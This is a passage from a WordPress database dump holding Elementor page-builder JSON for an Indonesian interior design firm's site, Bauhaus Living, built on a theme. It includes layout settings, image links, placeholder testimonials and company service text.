hardson\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"f80af3e\"}],\"background_item_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_margin\":{\"unit\":\"px\",\"top\":\"-15\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_animation\":\"bounceInUp\",\"_animation_tablet\":\"none\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"dot_control\":\"yes\",\"autoplay\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_testimonial\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5079813\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-contact-with-us.jpg\",\"id\":2653,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center center\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#242424\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.8,\"sizes\":[]},\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"170\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"140\",\"left\":\"0\",\"isLinked\":false},\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"4971895\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":30},\"elements\":[{\"id\":\"22aaaa7\",\"elType\":\"widget\",\"settings\":{\"title\":\"Challenges in deploying\\ninterior design applications\",\"align\":\"center\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"800\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"16\",\"bottom\":\"0\",\"left\":\"16\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_element_custom_width\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":42,\"sizes\":[]},\"typography_line_height\":{\"unit\":\"em\",\"size\":1.2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fe7bd92\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"\",\"library\":\"\"},\"label\":\"Get your quote or call: \",\"items_info\":[{\"type\":\"phone\",\"email_label\":\"email@company.com\",\"email_address\":\"email@company.com\",\"_id\":\"6dcb687\",\"phone_label\":\"+ 1800-111-543 \",\"phone_address\":\"1800111543\"}],\"alignment\":\"center\",\"label_color\":\"#FFFFFF\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"label_typography_font_weight\":\"700\",\"label_margin\":{\"unit\":\"px\",\"top\":\"3\",\"right\":\"3\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"contact_label_display\":\"inline-flex\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"info_typography_font_weight\":\"700\",\"info_color\":\"#E3B25A\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"contact_label_display_mobile\":\"inline-block\",\"alignment_mobile\":\"center\",\"info_item_alignment_mobile\":\"center\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"},{\"id\":\"1dbd858\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact with us\",\"background_color\":\"#FFFFFF\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"38\",\"bottom\":\"18\",\"left\":\"38\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\",\"typography_line_height\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"typography_line_height_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_line_height_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"link\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/contact\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"button_text_color\":\"#2D2D2D\",\"hover_color\":\"#FFFFFF\",\"button_bg_hover\":\"#E3B25A\",\"_animation\":\"none\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a9e80df\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"-66\",\"right\":0,\"bottom\":\"120\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"c5b31d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"1ecd2ea\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"40\",\"box_shadow_box_shadow_type\":\"yes\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":10,\"blur\":10,\"spread\":0,\"color\":\"rgba(0, 0, 0, 0.1)\"},\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"50\",\"bottom\":\"40\",\"left\":\"50\",\"isLinked\":false},\"background_background\":\"classic\",\"background_color\":\"#FFFFFF\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"-110\",\"left\":0,\"isLinked\":false},\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-couter.png\",\"id\":3570,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"%\",\"size\":-290,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"%\",\"size\":120,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":53,\"sizes\":[]},\"background_ypos\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":71,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"background_size\":\"auto\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"30\",\"bottom\":\"40\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[{\"id\":\"617f43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"ac2aeba\",\"elType\":\"widget\",\"settings\":{\"title\":\"Project Completed\",\"icon\":{\"value\":\"flaticon flaticon-architect-1\",\"library\":\"flaticon\"},\"number\":6800},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true},{\"id\":\"431e0f1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"da1e266\",\"elType\":\"widget\",\"settings\":{\"title\":\"Architectures\",\"number\":906,\"icon\":{\"value\":\"flaticon flaticon-architect\",\"library\":\"flaticon\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true},{\"id\":\"5255259\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"083da50\",\"elType\":\"widget\",\"settings\":{\"title\":\"Service providing\",\"number\":200,\"icon\":{\"value\":\"flaticon flaticon-buildings\",\"library\":\"flaticon\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true},{\"id\":\"944a539\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"d0e2ce9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Happy customers\",\"number\":9760,\"icon\":{\"value\":\"flaticon flaticon-satisfaction\",\"library\":\"flaticon\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4388608\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b6b9eaa\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5a2ebcc\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Our Architects\",\"title\":\"Our expert team\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"9d2f9e3\",\"elType\":\"widget\",\"settings\":{\"info_background_background\":\"classic\",\"info_background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-lines-team.png\",\"id\":937,\"alt\":\"\",\"source\":\"library\"},\"info_background_position\":\"top right\",\"info_background_repeat\":\"no-repeat\",\"total_count\":6,\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"ova_team\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7836724\",\"elType\":\"section\",\"settings\":{\"structure\":\"60\",\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b90ed21\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"_inline_size_mobile\":100,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b88a577\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/01.png\",\"id\":752,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ad43d0d\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"_inline_size_mobile\":100,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"35d31c6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/02.png\",\"id\":753,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0eaabe3\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"4c51b79\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/03.png\",\"id\":754,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ee06889\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"02c4aae\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/04.png\",\"id\":755,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"c6b5264\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"c3c96cc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/05.jpg.png\",\"id\":757,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"6720e69\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33},\"elements\":[{\"id\":\"77fc613\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/06.png\",\"id\":756,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(3685,4847,'_elementor_page_assets','a:1:{s:6:\"styles\";a:4:{i:0;s:12:\"e-animations\";i:1;s:12:\"e-animations\";i:2;s:12:\"e-animations\";i:3;s:12:\"e-animations\";}}'),(3686,4847,'_elementor_pro_version','3.8.1'),(3687,4848,'_wp_page_template','elementor_header_footer'),(3688,4848,'_elementor_edit_mode','builder'),(3689,4848,'_elementor_template_type','wp-page'),(3690,4848,'_elementor_version','3.8.1'),(3691,4848,'_elementor_data','[{\"id\":\"013ca3e\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-section-1.png\",\"id\":3589,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center right\",\"background_repeat\":\"no-repeat\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"10\",\"bottom\":\"80\",\"left\":\"10\",\"isLinked\":false},\"background_position_tablet\":\"top right\",\"background_size\":\"auto\",\"gap\":\"no\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"b6a844e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50.684,\"_inline_size_tablet\":100,\"align\":\"flex-end\",\"align_tablet\":\"flex-start\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-move-right\",\"animation_tablet\":\"none\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"56708b8\",\"elType\":\"widget\",\"settings\":{\"template\":\"template_2\",\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/about-get-to-know-us.jpg\",\"id\":710,\"alt\":\"\",\"source\":\"library\"},\"show_line_left\":\"yes\",\"text_left\":\"Architect\",\"text_left_margin\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"image_width_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"image_width_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"image_height_mobile\":{\"unit\":\"px\",\"size\":360,\"sizes\":[]},\"line_width_left_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"}],\"isInner\":false},{\"id\":\"1829eb5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":49.316,\"_inline_size_tablet\":100,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-move-left\",\"animation_tablet\":\"none\"},\"elements\":[{\"id\":\"2733af6\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"\",\"title\":\"\\\"Let\'s turn your ideas into reality\\\"\",\"align_heading\":\"left\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"13\",\"left\":\"0\",\"isLinked\":false},\"content_typography_title_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"dcb995a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Bauhaus Living adalah interior design consultant &amp; contractor yang telah berdiri sejak tahun 2005.<\\/p><p>Kami telah menangani 300+ proyek residential dan commercial di Jakarta dan sekitarnya.<\\/p><p>Misi kami adalah mengubah interior tempat tinggal maupun tempat kerja agar selain nyaman juga mewakili kepribadian penghuninya.<\\/p>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"7\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2eb768f\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Konsultasi perencanaan & interior design\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"ced22e0\"},{\"text\":\"Penyusunan Rencana Anggaran Belanja\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"e6ab069\"},{\"text\":\"Produksi furniture dan pekerjaan sipil\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#242424\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"bold\",\"space_between\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"space_between_mobile\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":1.4,\"sizes\":[]},\"icon_typography_line_height_tablet\":{\"unit\":\"em\",\"size\":1.2,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"f3caa1a\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\"},\"elements\":[{\"id\":\"697046f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":20},\"elements\":[{\"id\":\"4b2c591\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/09\\/john_allan.jpg\",\"id\":4839,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"image_border_width\":{\"unit\":\"px\",\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"_element_width\":\"auto\",\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"_border_color\":\"#E3B25A\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"15\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"9b875c0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":79.92,\"space_between_widgets\":10},\"elements\":[{\"id\":\"1150f91\",\"elType\":\"widget\",\"settings\":{\"title\":\"John Alan\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"header_size\":\"h3\",\"typography_font_weight\":\"100\",\"text_stroke_text_stroke_type\":\"yes\",\"text_stroke_text_stroke\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"23ae2ff\",\"elType\":\"widget\",\"settings\":{\"editor\":\"CO - FOUNDER\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e8e90de\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5b19198\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"d460dea\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Real Testimonials\",\"title\":\"What they\\u2019re talking about BauHaus\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"da0b416\",\"elType\":\"widget\",\"settings\":{\"version\":\"version_1\",\"tab_item\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"11f956f\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#242424\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"d232423\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/jessica.jpg\",\"id\":1416,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#E3B25A\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"8056628\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#242424\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/avatar.jpg\",\"id\":718,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#242424\",\"_id\":\"51a9c88\"}],\"tab_item_v2\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"9c560b9\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"63f0bcf\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"9b446cc\"}],\"tab_item_v3\":[{\"name_author\":\"Kevin martin\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"94218cd\"},{\"name_author\":\"Jessica brown \",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"9ac0b32\"},{\"name_author\":\"Mike hardson\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"f80af3e\"}],\"background_item_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_margin\":{\"unit\":\"px\",\"top\":\"-15\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_animation\":\"bounceInUp\",\"_animation_tablet\":\"none\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"dot_control\":\"yes\",\"autoplay\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_testimonial\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5079813\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-contact-with-us.jpg\",\"id\":2653,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center 